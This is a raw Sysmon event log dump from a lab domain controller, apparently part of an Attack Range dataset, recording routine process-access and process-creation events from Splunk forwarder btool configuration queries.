12:02:54.444{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008189Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.444{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008188Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.444{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008187Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.444{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008186Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.444{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64EE-6064-DF00-00000000AE01}7136C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008185Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.444{266CAFBE-64EE-6064-DB00-00000000AE01}70607064C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{266CAFBE-64EE-6064-DF00-00000000AE01}7136C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+14738|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d1d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008184Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.444{266CAFBE-64EE-6064-DF00-00000000AE01}7136C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64EE-6064-DB00-00000000AE01}7060C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000008183Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.398{266CAFBE-64EE-6064-DE00-00000000AE01}71127116C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008182Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.148{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64EE-6064-DE00-00000000AE01}7112C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008181Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.148{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008180Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.148{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008179Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.148{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008178Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.148{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-64EE-6064-DE00-00000000AE01}7112C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008177Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.148{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008176Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.148{266CAFBE-64EE-6064-DD00-00000000AE01}70927096C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{266CAFBE-64EE-6064-DE00-00000000AE01}7112C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008175Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.152{266CAFBE-64EE-6064-DE00-00000000AE01}7112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-64EE-6064-DD00-00000000AE01}7092C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool web list settings --no-log 10341000x80000000000000008174Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.133{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64EE-6064-DD00-00000000AE01}7092C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008173Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.133{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008172Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.133{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008171Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.133{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008170Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.133{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64EE-6064-DD00-00000000AE01}7092C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008169Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.133{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008168Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.133{266CAFBE-64EE-6064-DC00-00000000AE01}70807084C:\Windows\system32\cmd.exe{266CAFBE-64EE-6064-DD00-00000000AE01}7092C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008167Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.145{266CAFBE-64EE-6064-DD00-00000000AE01}7092C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{266CAFBE-64EE-6064-DC00-00000000AE01}7080C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool web list settings --no-log 10341000x80000000000000008166Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.133{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64EE-6064-DC00-00000000AE01}7080C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008165Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.133{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008164Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.133{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008163Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.133{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008162Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.133{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008161Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:54.133{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-64EE-6064-DC00-00000000AE01}7080C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008160Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 